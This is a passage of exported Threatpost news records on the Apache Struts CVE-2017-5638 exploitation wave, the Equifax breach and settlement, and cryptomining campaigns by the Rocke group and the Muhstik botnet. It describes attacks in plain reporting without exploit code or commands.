"type": "threatpost", "title": "Panda Threat Group Mines for Monero With Updated Payload, Targets", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-10271", "CVE-2017-5638", "CVE-2019-2725"], "modified": "2019-09-17T21:04:35", "id": "THREATPOST:12E93CDF8BAC1B158CE1737E859FDD80", "href": "https://threatpost.com/panda-threat-group-mines-for-monero-with-updated-payload-targets/148419/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T22:53:59", "description": "Public attacks and scans looking for exposed Apache webservers have ramped up dramatically since Monday when a vulnerability in the Struts 2 web application framework was [patched](<https://cwiki.apache.org/confluence/display/WW/S2-045>) and proof-of-concept exploit code was introduced into Metasploit.\n\nThe vulnerability, [CVE-2017-5638](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638>), was already under attack in the wild prior to Monday\u2019s disclosure, but since then, the situation has worsened and experts fear it\u2019s going to linger for a while.\n\n\u201cThe second someone starts working on a [Metasploit module](<https://github.com/rapid7/metasploit-framework/issues/8064>), it\u2019s a ramp-up for rapid exploitation by a large number of people,\u201d said Craig Williams, senior technical leader for Cisco\u2019s Talos research outfit. \u201cWe\u2019re basically seeing a huge number of people continue to exploit the vulnerability. That\u2019s likely going to continue to increase. I think what we\u2019re also going to see is people going to try to scan for the vulnerability.\u201d\n\nThe flaw lives in the Jakarta Multipart parser upload function in Apache. It allows an attacker to easily make a maliciously crafted request (a malicious Content-Type value) to an Apache webserver and have it execute. Struts 2.3.5 to Struts 2.3.31 are affected as are Struts 2.5 to 2.5.10; admins are urged to upgrade immediately to [Struts 2.3.32](<https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.3.32>) or [2.5.10.1](<https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.10.1>).\n\nTalk of the vulnerability surfaced on Chinese forums, according to Vincente Motos, who posted an advisory on the [HackPlayers](<http://www.hackplayers.com/2017/03/exploit-rce-para-apache-struts-cve-2017-5638.html>) website. Motos said a notorious Apache Struts hacker known as Nike Zheng posted a public proof-of-concept exploit demonstrating the simplicity in which an attacker could inject operating system commands.\n\nThe attacks are particularly risky to anyone running their Apache webservers as root, which is not a suggested practice. Williams said it\u2019s unclear whether an attacker can benignly scan for vulnerable servers in order to determine the version and context under which Struts is running, whether as Apache or root, for example. But as with some older internet-wide bugs, there are a large number of scans happening.\n\n\u201c[Attacks] look like requests to a webserver with a malformed piece,\u201d Williams said. \u201cUnless you\u2019re looking for it, it\u2019s easy not to see the malformed content type.\u201d\n\nAn attacker, he said, would need to just modify one line depending on the operating system the target is running, Windows or Linux, and have it download a malicious binary from the web.\n\n\u201cUnfortunately, due to the nature of command-line injections like this, it\u2019s very easy to modify,\u201d Williams said. \u201cAnd that\u2019s why I think we\u2019re going to continue to see exploitation rise for the foreseeable future.\u201d\n\nThe risks are severe for an organization running an exposed Apache server if it\u2019s compromised.\n\n\u201cThe sky\u2019s the limit,\u201d Williams said. \u201cIf I\u2019m a bad guy, depending on what my game is, I can take over your webserver and use that to move laterally through your network. If I\u2019m super insidious, I can use that to look for your domain controller and if I can find a way to compromise your password hashes, say from the Linux server I compromised, I can possibly log in to your domain controller and use that to push malware to all your machines. I could ransom off your webserver, all kinds of terrible things.\u201d\n\nWilliams said [Cisco has observed](<http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>) that the majority of public attacks feature a number of Linux bots used for DDoS attacks taking advantage of this vulnerability, along with an IRC bouncer, and a malware sample related to the bill gates botnet.\n\nWilliams cautioned as well that connected devices in the IoT space could also be a major concern, since Struts 2 likely runs there.\n\n\u201cI\u2019m going to guess there\u2019s a reasonable number of devices running it, and due to the nature of IoT, those aren\u2019t going to be patched any time soon. So this is going to be an issue for the foreseeable future.\u201d\n\nGiven the availability of patches and detection rules, it\u2019s likely that public attacks are going to be largely mitigated and as more detection rules surface, public exploits should be less useful to attackers.\n\n\u201cDue to the fact that it\u2019s relatively easy to go inside and modify an attack, it\u2019s going to be bad and it\u2019s going to plague us for some time,\u201d Williams said. \u201cGood news is that detecting it is not that difficult.\u201d\n", "cvss3": {}, "published": "2017-03-09T12:25:46", "type": "threatpost", "title": "Attacks Heating Up Against Apache Struts 2 Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-09T19:50:52", "id": "THREATPOST:1C2F8B65F8584E9BF67617A331A7B993", "href": "https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-23T05:27:47", "description": "Equifax said that an additional 2.4 million Americans have had their [personal data](<https://investor.equifax.com/news-and-events/news/2018/03-01-2018-140531340>) stolen as part of the company\u2019s massive 2017 data breach, including their names and some of their driver\u2019s license information.\n\nThe additional identified victims bring the total of those implicated in what has become the largest data breach of personal information in history to around 148 million people.\n\nThe consumer credit reporting agency on Thursday said that as part of an \u201congoing analysis\u201d it found that these newly identified victims\u2019 names and partial driver\u2019s license numbers were stolen by attackers. However, unlike the previous 145.5 million people who have been identified to date as impacted by the 2017 breach, the Social Security numbers of these additional victims were not impacted.\n\nAttackers were also unable to reach additional license details for this latest slew of impacted victims \u2013 including the state where their licenses were issued and the expiration dates.\n\n\u201cThis is not about newly discovered stolen data,\u201d Paulino do Rego Barros, Jr., interim chief executive officer of Equifax, said in a statement. \u201cIt\u2019s about sifting through the previously identified stolen data, analyzing other information in our databases that was not taken by the attackers, and making connections that enabled us to identify additional individuals.\u201d\n\nEquifax said the new victims were not previously identified because their Social Security numbers were not stolen together with their driver\u2019s license information.\n\n\u201cThe methodology used in the company\u2019s forensic examination of last year\u2019s cybersecurity incident leveraged Social Security Numbers (SSNs) and names as the key data elements to identify who was affected by the cyberattack,\u201d said the company in a statement. \u201cThis was in part because forensics experts had determined that the attackers were predominately focused on stealing SSNs.\u201d\n\nEquifax said it will notify the newly identified consumers directly by U.S. Postal mail, \u201cand will offer identity theft protection and credit file monitoring services at no cost to them,\u201d said the company.\n\nThe company did not respond to requests for further comment from Threatpost about its current ongoing analysis of the breach.\n\n**Ongoing Breach Disclosures**\n\nEquifax has been under public scrutiny since September, that\u2019s when it first disclosed the data breach after issuing a statement at the time that cybercriminals had exploited an unnamed \u201cU.S. website application vulnerability to gain access to certain files\u201d from May through July 2017. Equifax said it discovered the breach on July 29. The breach enabled criminals to access sensitive data like social security numbers, birth dates, and license numbers.\n\nLater, during Equifax\u2019s testimony in October before the U.S. House Committee on Energy and Commerce Subcommittee on Digital Commerce and Consumer Protection, it was revealed that Equifax was notified in March that the breach was tied to an unpatched [Apache Struts vulnerability, CVE-2017-5638](<https://threatpost.com/oracle-patches-apache-struts-reminds-users-to-update-equifax-bug/128151/>). It was established that while Equifax said it had requested the \u201capplicable personnel responsible\u201d to update the vulnerability it never was fixed.\n\n\u201cIt appears that the breach occurred because of both human error and technology failures,\u201d Richard Smith, Equifax CEO at the time, wrote in a [testimony](<http://docs.house.gov/meetings/IF/IF17/20171003/106455/HHRG-115-IF17-Wstate-SmithR-20171003.pdf>) that was released at the hearing in October.\n\nMaking the breach worse was Equifax\u2019s further botched response to the breach.\n\nAfter the breach was revealed in September, the company\u2019s site was crushed with traffic from concerned customers that left the site unreachable. In a separate instance in October, the Equifax site came under fire for harboring [adware](<https://threatpost.com/equifax-takes-down-compromised-page-redirecting-to-adware-download/128406/>) in a third-party partner\u2019s Flash Player download.\n\nThe extent and scope of the breach also has been continually expanding since it was first disclosed in September. In October, after an analysis with security company Mandiant, the company said that an [additional](<https://threatpost.com/equifax-says-145-5m-affected-by-breach-ex-ceo-testifies/128247/>) 2.5 million customers were also impacted on top of the 143 million the company initially said were affected.\n\nMeanwhile, in February, documents submitted by Equifax to the US Senate Banking Committee revealed that attackers also accessed taxpayers identification numbers, email addresses, and credit card expiration dates for certain customers.\n\n**Renewed Anger**\n\nThis latest slew of impacted customers has renewed anger against the company, with some demanding stricter legislation for data protection \u2013 such as the proposed Data Breach Prevention and Compensation Act, which would impose strict security-related fines on credit reporting agencies.\n\n> My office is continuing our investigation of [#Equifax](<https://twitter.com/hashtag/Equifax?src=hash&ref_src=twsrc%5Etfw>) so we can get to the bottom of how this disastrous data breach happened. \n> \n> We also need to change the law.\n> \n> \u2014 Eric Schneiderman (@AGSchneiderman) [March 1, 2018](<https://twitter.com/AGSchneiderman/status/969229077814108160?ref_src=twsrc%5Etfw>)\n\n> This is unacceptable. The California Department of Justice will continue to get to the bottom of this massive cybersecurity incident. We are committed to holding [#Equifax](<https://twitter.com/hashtag/Equifax?src=hash&ref_src=twsrc%5Etfw>) accountable to the fullest extent of the law. <https://t.co/fRPrUWcIyg>\n> \n> \u2014 Xavier Becerra (@AGBecerra) [March 1, 2018](<https://twitter.com/AGBecerra/status/969330796774359040?ref_src=twsrc%5Etfw>)\n\nEquifax, meanwhile, continues to remain under investigation by several federal and state agencies, including a probe by the Consumer Financial Protection Bureau.\n\nCustomers can see if their personal information has been breached by clicking on an \u201cAm I Impacted\u201d tool on Equifax\u2019s [website](<https://www.equifaxsecurity2017.com/>). The company also advised consumers to visit its web portal where they can review their account statements and credit reports, identify any unauthorized activity, and protect their personal information from attack.\n\nThe company handles data on more than 820 million customers and 91 million businesses worldwide.\n", "cvss3": {}, "published": "2018-03-02T15:12:57", "type": "threatpost", "title": "Equifax Says 2.4 Million More People Impacted By Massive 2017 Breach", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-03-02T15:12:57", "id": "THREATPOST:AD5395CA5B3FD95FAD8E67B675D0AFCA", "href": "https://threatpost.com/equifax-adds-2-4-million-more-people-to-list-of-those-impacted-by-2017-breach/130209/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-04-11T11:42:25", "description": "Equifax will pay as much as $700 million to settle federal and state investigations on the heels of its infamous 2017 breach, which exposed the data of almost 150 million customers.\n\nThe consumer credit reporting agency on Monday [said](<https://investor.equifax.com/news-and-events/news/2019/07-22-2019-125543228>) it will dish out $300 million to cover free credit monitoring services for impacted consumers, $175 million to 48 states in the U.S, and $100 million in civil penalties to the Consumer Financial Protection Bureau (CFPB). If the initial amount does not cover consumer losses, the company may need to pay an additional $125 million.\n\n\u201cCompanies that profit from personal information have an extra responsibility to protect and secure that data,\u201d said Federal Trade Commission (FTC) Chairman Joe Simons [in a statement](<https://www.ftc.gov/news-events/press-releases/2019/07/equifax-pay-575-million-part-settlement-ftc-cfpb-states-related?utm_source=slider>). \u201cEquifax failed to take basic steps that may have prevented the breach that affected approximately 147 million consumers. This settlement requires that the company take steps to improve its data security going forward, and will ensure that consumers harmed by this breach can receive help protecting themselves from identity theft and fraud.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nEquifax, which handles data associated with more than 820 million customers and 91 million businesses worldwide, has been under public scrutiny since September 2017 when [it disclosed](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) a data breach that impacted almost 150 million Americans. The attackers managed to [access information](<https://threatpost.com/equifax-data-nation-state/141929/>) containing Social Security numbers, birth dates, addresses, and some driver\u2019s license numbers. Equifax said it discovered the intrusion on July 29, meaning attackers apparently had access to the company\u2019s files for nearly 12 weeks.\n\nAfter the data breach, Equifax was hit by multiple lawsuits, as well as investigations by the FTC, the CFPB, the Attorneys General of 48 states, and more.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/07/22101929/eqfx-socmed-summary.png>)\n\nLawsuits claimed that Equifax failed to patch its network in March 2017 after being alerted of a [critical security flaw](<https://threatpost.com/equifax-adds-2-4-million-more-people-to-list-of-those-impacted-by-2017-breach/130209/>) (an Apache Struts vulnerability, CVE-2017-5638) in its Equifax Automated Consumer Interview System database (which handles inquiries from consumers about their personal credit data). This vulnerability was ultimately exploited by bad actors, leading to the data breach.\n\nAs part of the agreement, Equifax also said it will take steps to enhance its information security and technology program, as well as make payments totaling $290.5 million to state and federal regulatory agencies to pay attorneys\u2019 fees and costs in the multi-district litigation.\n\nIn the past month, a slew of fines and penalties have been imposed that were tied privacy and data breach incidents. Earlier in July, the [FTC slapped](<https://threatpost.com/privacy-experts-facebooks-5b-fine/146478/>) a $5 billion fine on Facebook for privacy violations following its Cambridge Analytica incident. Also hit with security-related fines in July were [Marriott](<https://threatpost.com/marriott-123m-fine-data-breach/146320/>) ($123 million) and [British Airways](<https://threatpost.com/post-data-breach-british-airways-slapped-with-record-230m-fine/146272/>) ($230 million).\n\nWhile opinions are mixed about the appropriate penalty for these companies and Equifax, security experts for their part hope that other companies will take note of the fines when it comes to data security and privacy.\n\n\u201cI\u2019m far from an Equifax apologist, but the truth is it could have been anyone,\u201d Adam Laub, chief marketing officer at STEALTHbits Technologies said in an email. \u201cIt\u2019s not an excuse, but rather the reality we live in. The best outcome isn\u2019t Equifax making the situation right \u2013 although that is important for all of those affected \u2013 it\u2019s everyone else learning that the price to be paid outweighs the inconvenience of ensuring proper measures are taken to secure the data that puts them at risk in the first place. And it\u2019s got to be from the ground up too. There\u2019s no silver bullet.\u201d\n\n**_Interested in more on patch management? Don\u2019t miss our free live _**[**_Threatpost webinar_**](<https://attendee.gotowebinar.com/register/1579496132196807171?source=ART>)**_, \u201c_****_Streamlining Patch Management,\u201d on Wed., July 24, at 2:00 p.m. EDT. Please join Threatpost editor Tom Spring and a panel of patch experts as they discuss the latest trends in Patch Management, how to find the right solution for your business and what the biggest challenges are when it comes to deploying a program. _****_[Register and Learn More](<https://attendee.gotowebinar.com/register/1579496132196807171?source=ART>)_**\n", "cvss3": {}, "published": "2019-07-22T14:31:39", "type": "threatpost", "title": "Equifax to Pay $700 Million in 2017 Data Breach Settlement", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2019-07-22T14:31:39", "id": "THREATPOST:5ADABEB29891532ECFF2D6ABD99CAED4", "href": "https://threatpost.com/equifax-to-pay-700-million-in-2017-data-breach-settlement/146579/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T22:53:58", "description": "Malicious traffic stemming from exploits against the [Apache Struts 2 vulnerability](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>) disclosed and [patched](<https://cwiki.apache.org/confluence/display/WW/S2-045>) this week has tapered off since Wednesday.\n\nResearchers at Rapid7 published an [analysis](<https://community.rapid7.com/community/infosec/blog/2017/03/09/apache-jakarta-vulnerability-attacks-in-the-wild>) of data collected from its honeypots situated on five major cloud providers and a number of private networks that shows a couple of dozen sources have targeted this vulnerability, but only two, originating in China, have actually sent malicious commands.\n\nCisco Talos said on Thursday that attacks had [risen sharply](<http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>) since word leaked of publicly available exploits and a [Metasploit module](<https://github.com/rapid7/metasploit-framework/issues/8064>). But it conceded that it was difficult to ascertain whether probes for vulnerable Apache servers could be carried out benignly.\n\nRapid7 said that in a 72-hour period starting Tuesday, a handful of events cropped up peaking at fewer than 50 between 11 a.m. and 6 p.m. Wednesday.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2017/03/06230023/pastedImage_1.png>)\n\n\u201cWe are really seeing limited attempts to exploit the vulnerability,\u201d said Tom Sellers, threat analyst and security researcher at Rapid7. \u201cFor context, please keep in mind that our data is from honeypots hosted in cloud providers and may not reflect what other sensors and organizations are seeing.\u201d\n\nCraig Williams, Cisco Talos senior technical lead, said researchers there are seeing attack traffic trending downward as well.\n\n\u201cEarly indicators and past experiences were pointing to this being an ongoing issue with attackers continuing to seek out vulnerable machines. Interestingly, over the last couple days, we have seen a slowing of activity,\u201d Williams said. \u201cBecause this is so unusual, we are continuing to monitor the situation in case the trend starts moving in the other direction. Again, this is not typical for this type of issue but great news all the same.\u201d\n\nThe vulnerability is in the Jakarta Multipart parser that comes with Apache. An attacker can trivially exploit the vulnerability to gain remote code execution by sending a HTTP request that contains a crafted Content-Type value. The vulnerable software will throw an exception in such cases.\n\n\u201cWhen the software is preparing the error message for display, a flaw in the Apache Struts Jakarta Multipart parser causes the malicious Content-Type value to be executed instead of displayed,\u201d Sellers wrote in an analysis published yesterday.\n\nThe vulnerability was disclosed and patched on Monday, and by Tuesday, Rapid7 was seeing two malicious requests from a host geo-located in Zhengzhou, China. The attacks arrived in HTTP GET requests and issued commands to the vulnerable webserver for it to download binaries from the attacker-controlled server on the internet. Sellers called it a standard command-injection attack against a webserver where the attacker is able to write code that instructs the server to reach out to an IP address and download code that executes on the server.\n\nThe second attack was spotted Wednesday when a host in Shanghai, China sent HTTP POST requests to servers instructing them to disable their firewall and grab code related to the XOR DDoS malware family.\n\n\u201cWhile we\u2019ve seen a couple dozen sources exploiting the vulnerability, only those two issued malicious commands,\u201d Sellers said. \u201cWe\u2019ve actually seen a drop off in related traffic since Wednesday. The most active attacker stopped on Thursday around 4 a.m. U.S. Central time.\u201d\n\nSellers said it\u2019s unclear as to why there\u2019s been a dropoff in malicious traffic.\n\n\u201cIt could be caused by a number of factors. The malicious payload is pretty obvious and easy to filter if traffic is inspected,\u201d Sellers said. \u201cAttackers might be prioritizing other vulnerabilities such as the ones announced in cameras recently. The lull may be temporary and we may see activity rise again after attention moves on to efforts.\u201d\n\nCisco raised the issue of IoT devices running the vulnerable Apache software as well, which could be an indicator of initial interest from DDoS bots.\n\n\u201cGiven the low sample size it\u2019s difficult for me to say.It\u2019s possible that DDoS bots are the early adopters since infection would generate easy, repeatable income and the code was trivial to port to existing frameworks,\u201d Sellers said. \u201cCompare that to ransomware, where a new deployment mechanism may need to be written but would likely only result in a single payout per host.\u201d\n\nResearchers were also seeing a number of requests probing for additional vulnerable servers that included whoami and ifconfig, commands that are relatively benign but could return information about what context the server is running in. Servers running at root\u2014an uncommon practice\u2014are most at risk.\n", "cvss3": {}, "published": "2017-03-10T10:51:01", "type": "threatpost", "title": "Apache Attack Traffic Dropping, Limited to Few Sources", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-10T16:12:17", "id": "THREATPOST:AACAA4F654495529E053D43901F00A81", "href": "https://threatpost.com/apache-attack-traffic-dropping-limited-to-few-sources/124227/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-23T05:28:31", "description": "Equifax, the credit agency behind this summer\u2019s breach of 143 million Americans, said this week the number of victims implicated in the breach has increased.\n\nPaulino do Rego Barros, Jr., the company\u2019s interim CEO, [announced Monday](<https://www.equifaxsecurity2017.com/>) that 2.5 million additional Americans were also impacted, bringing the grand total to 145.5 million affected individuals.\n\nEquifax initially called its investigation around the breach \u201csubstantially complete,\u201d but said it was still carrying out further analysis with Mandiant, a FireEye company it hired to investigate the breach, on the incident. According to Equifax, investigators didn\u2019t find any additional vulnerabilities. The extra 2.5 million Americans figure came \u201cduring Mandiant\u2019s completion of the remaining investigative tasks and quality assurance procedures built into the investigative process.\u201d\n\nThe company used the opportunity on Monday to reiterate that Canadian citizens were also impacted, although far fewer than initially thought. The company said there may have been up to 100,000 Canadians affected several weeks ago however upon closer inspection, only 8,000 Canadian consumers were affected by the breach.\n\nEquifax says its still analyzing exactly how many United Kingdom consumers have been affected by the breach and is in the middle discussions with regulators to determine how to notify them.\n\nDetails about the breach came out the day before Richard Smith, Equifax\u2019s former CEO, was scheduled to testify about the breach before the U.S. House Committee on Energy and Commerce Subcommittee on Digital Commerce and Consumer Protection. Smith, former Equifax chairman and chief executive, [retired last Tuesday](<https://threatpost.com/oracle-patches-apache-struts-reminds-users-to-update-equifax-bug/128151/>) in wake of the breach.\n\nIn a [written testimony (.PDF)](<http://docs.house.gov/meetings/IF/IF17/20171003/106455/HHRG-115-IF17-Wstate-SmithR-20171003.pdf>) released in tandem with the subcommittee hearing, Smith blamed the breach on a combination of \u201chuman error and technology failures.\u201d\n\n\u201cThese mistakes \u2013 made in the same chain of security systems designed with redundancies \u2013 allowed criminals to access over 140 million Americans\u2019 data,\u201d Smith wrote.\n\nIn the testimony Smith claimed that the U.S. Department of Homeland Security\u2019s Computer Emergency Readiness Team (U.S. CERT) notified Equifax on March 8 that [it needed to patch CVE-2017-5638](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>), the Apache Struts vulnerability that eventually led to the hack.\n\nEquifax requested the \u201capplicable personnel responsible\u201d update Apache Struts via email on March 9, something that should have been done within a 48 hour period, Smith said.\n\nThat was never done and according to Smith, the vulnerability wasn\u2019t picked up by internal scans designed to identify vulnerable systems carried out on March 15. The issue lingered for roughly two months until attackers accessed Equifax\u2019s systems on May 13 \u2013 and persisted until the company became aware of the attackers on July 30.\n\nGreg Walden (R-Ore.) pointed out some of Equifax\u2019s many missteps on Tuesday morning, including how Equifax\u2019s consumer facing website for the breach was put hosted on a separate domain from the main Equifax website, the confusion that spawned, and how on multiple occasions Equifax directed users to the wrong website.\n\n\u201cOn top of all the other issues, multiple times Equifax tweeted the wrong URL directing consumers to the wrong website to check if they were part of a breach,\u201d Walden said, \u201cTalk about ham-handed responses this is simply unacceptable and it makes me wonder if there was a breach response plan in place at all and if anyone was in charge of executing that plan.\u201d\n\nDuring another part of the hearing, Tim Murphy, a U.S. representative for Pennsylvania\u2019s 18th Congressional district, came back to that question. When told the company\u2019s original site couldn\u2019t handle the traffic is received, Murphy was befuddled.\n\n\u201cWhy wouldn\u2019t your website be able to handle this kind of traffic?\u201d Murphy asked, \u201cIt just doesn\u2019t make sense, a company your size and with your knowledge, doesn\u2019t understand how to handle traffic for over 100 million people, don\u2019t you use an Elastic cloud computing service that would\u2019ve accounted for this?\u201d\n\nSmith said the sheer amount of traffic Equifax\u2019s site received in wake of the breach made hosting a site on its domain impossible.\n\n\u201cThe environment the micro site is in is a cloud environment that\u2019s very, very scalable,\u201d Smith said. \u201cOur traditional environment could not handle 400 million consumer visits for three weeks.\u201d\n\nMurphy also grilled Smith on what took Equifax so long to patch the March vulnerability and if it\u2019s possible Equifax\u2019s internal scanning system could potentially miss another vulnerability.\n\n\u201cIf the patch only took a few days to apply why did Equifax fail to apply it in March when it was announced as critical?\u201d Murphy asked.\n\nSmith skirted the question and instead discussed the difficulties associated with patching.\n\n\u201cPatching can take a variety of time\u2026 it can take days or up to a week or more,\u201d Smith said, adding that he wasn\u2019t aware of the particular Struts vulnerability at the time.\n\nAt the end of the hearing, when pressed by Anna Eshoo, U.S. Representative for California\u2019s 18th congressional district, Smith described the process around patching again but did little to deviate from his prepared testimony.\n\n\u201cI want to know when they did it, when they took care of [the patch]\u201d Eshoo said.\n\n\u201cThey took care of it in July because we never found it,\u201d Smith said. \u201cWe had the human error, we did the scan, the technology never found it, in July we found suspicious activity, took the portal down, found the vulnerability, applied the patch.\u201d\n", "cvss3": {}, "published": "2017-10-03T15:27:08", "type": "threatpost", "title": "Equifax Says 145.5M Affected by Breach, Ex-CEO Testifies", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-10-03T15:27:08", "id": "THREATPOST:5E633FD1C6A5B5BB74F1B6A8399001A2", "href": "https://threatpost.com/equifax-says-145-5m-affected-by-breach-ex-ceo-testifies/128247/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-30T05:51:17", "description": "Researchers are warning of a Chinese-language threat actor leveraging a wide array of Git repositories to infect vulnerable systems with Monero-based cryptomining malware.\n\nResearchers at Cisco Talos, who discovered the threat actor they call \u201cRocke\u201d, said they have been tracking the adversary since April as it continues to plant various Monero miners on vulnerable systems. Rocke\u2019s hallmark is the enlisting of toolkits that leverage Git repositories, HTTP File Servers (HFS) and a myriad of different payloads. The name Rocke was derived the the group\u2019s Monero wallet that includes \u201crocke@live.cn\u201d.\n\n\u201cRocke will continue to leverage Git repositories to download and execute illicit mining onto victim machines,\u201d the research team said in a [post](<https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html>) Thursday. \u201cIt is interesting to note that they are expanding their toolset to include browser-based miners, difficult-to-detect trojans, and the Cobalt Strike malware.\u201d\n\nCisco Talos said it first spotted the threat actor in April 2018 when its malware was found in both Western and Chinese honeypots attempting to exploit the an Apache Struts vulnerability.\n\nA user named \u201cc-000\u201d first downloaded several files to the researchers\u2019 Struts 2 honeypot from the Chinese repository site (Gitee.com), researchers said. At the same time another user named \u201cc-18\u201d pulled down files in similar activity from a GitLab.com repository page. The repositories on both Gitee and GitLab were identical, leading researchers to determine they were the same actor. The repositories also contained similar files such as an array of ELF executables, shell scripts, and text files. Each executed and a variety of Monero-based cryptocurrency miners.\n\n\u201cAfter months of research, we believe that Rocke is an actor that must be followed, as they continue to add new features to their malware and are actively exploring new attack vectors,\u201d wrote David Liebenberg, senior threat analyst, who authored the Cisco Talos report.\n\nResearchers said they found the same threat actor exploiting an Oracle WebLogic server vulnerability (CVE-2017-10271), and also exploiting a critical Java deserialization vulnerability in the Adobe ColdFusion platform (CVE-2017-3066).\n\n## Recent Campaigns\n\nAs recently as late July, researchers said they discovered another similar campaign on their Struts 2 honeypot. The honeypot received a wget request (a command for downloading files from the internet) for a file called \u201c0720.bin.\u201d When researchers did some digging and visited the host this file was located on, they discovered that it contained a slew of additional files, including shell scripts and cryptominers.\n\nThose files included an Executable and Linkable (ELF) file called \u201c3307.bin,\u201d a shell script called \u201ca7\u201d that kills a variety of processes related to other cryptomining malware, as well as shell scripts \u201clowerv2.sh\u201d and \u201crootv2.sh,\u201d which attempt to download and execute cryptomining malware.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/08/30151343/talos.png>)\n\nThey also found a file called \u201cconfig.json,\u201d which is a mining config file for open-source Monero miner XMRig. Another file, \u201cPools.txt,\u201d appears to be a config file for XMR-stak, an open-source universal Stratum pool miner that mines Monero, Aeon and more. Both miners have the same mining pool and wallet information.\n\nOther miners in the files include \u201cBashf,\u201d a variant of XMR-stak, and \u201cbashg,\u201d a variant of XMRig.\n\nFinally, Cisco Talos said it found a file dubbed \u201cTermsHost.exe,\u201d a PE 32 Monero miner, which researchers said can be purchased online for $14 and targets malicious actors: \u201cAdvertising for the miner promotes it as offering startup registry key persistence, mining only while idle, and the ability to inject the miner into \u2018Windows processes to bypass firewalls,'\u201d Liebenberg wrote.\n\nThe sample first grabs the config file \u201cxmr.txt\u201d containing the same configuration information as the previous files, from Rocke\u2019s command-and-control (C2) server, and then injects code into notepad.exe, which then proceeds to communicate with the MinerGate pool.\n\n\u201cIntriguingly, this file appears to share some similarities with Cobalt Strike, the popular penetration testing software, which would allow the attacker to have greater control over the infected system,\u201d researchers said.\n\n## Threat Actor\n\nLiebenberg said Cisco Talos was able to discover more about Rocke through several emails associated with the threat actor\u2019s MinerGate Monero wallet (rocke@live.cn and jxci@vip.qq.com): \u201cThe majority of websites registered to Rocke list Jiangxi Province addresses for their registration,\u201d he said. \u201cSome of these websites were for Jiangxi-based businesses, such as belesu[.]com, which sells baby food\u2026 It is possible that the \u2018jx\u2019 in jxci@vip.qq.com stands for Jiangxi. Therefore, we assess with high confidence that Rocke operates from Jiangxi Province.\u201d\n\nThe payload is similar to one used by the [Iron Cybercrime Group](<https://www.intezer.com/iron-cybercrime-group-under-the-scope-2/>), Cisco Talos said: \u201cBoth Iron and Rocke\u2019s malware behave similarly, and reach out to similar infrastructure,\u201d they said. \u201cSo, while we can assess with high confidence that the payloads share some code base, we are still unsure of the exact relationship between Rocke and Iron Cybercrime Group.\u201d\n\nLiebenberg pointed to cryptomining malware as increasing in popularity, with the Rocke threat actor an example of varying methods to download and execute various malware.\n\n\u201cDespite the volatility in the value of various cryptocurrencies, the trend of illicit cryptocurrency mining activity among cybercriminals shows no signs of abating,\u201d they said. \u201cRocke\u2019s various campaigns show the variety of infection vectors, malware, and infrastructure that these criminals will employ to achieve their goals.\u201d\n", "cvss3": {}, "published": "2018-08-30T20:35:39", "type": "threatpost", "title": "New Threat Actor \u2018Rocke\u2019: A Rising Monero Cryptomining Menace", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-10271", "CVE-2017-3066"], "modified": "2018-08-30T20:35:39", "id": "THREATPOST:E43EB029B562B5665C8385E16145288A", "href": "https://threatpost.com/new-threat-actor-rocke-a-rising-monero-cryptomining-menace/137090/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-04-25T05:50:10", "description": "Researchers are warning a recently discovered and highly critical vulnerability found in Drupal\u2019s CMS platform is now being actively exploited by hackers who are using it to install cryptocurrency miners and to launch DDoS attacks via compromised systems. At the time of the disclosure, last month, researchers said they were not aware of any public exploits.\n\nNow Netlab 360 researchers say they have identified a botnet, dubbed Muhstik, that is taking advantage of the Drupal bug. They said multiple scans on infected Drupal instances reveal[ attackers](<https://blog.netlab.360.com/botnet-muhstik-is-actively-exploiting-drupal-cve-2018-7600-in-a-worm-style-en/>) are exploiting the vulnerability by accessing a URL and then injecting exploit code. The technique allows adversaries to execute commands on targeted servers running Drupal.\n\nThe Muhstik botnet exploits Drupal vulnerability ([CVE-2018-7600](<https://groups.drupal.org/security/faq-2018-002>)), impacting versions 6,7, and 8 of Drupal\u2019s CMS platform. \u201cThis potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised,\u201d warned MITRE\u2019s Common Vulnerabilities and Exposures bulletin on March 28.\n\nDrupal, which 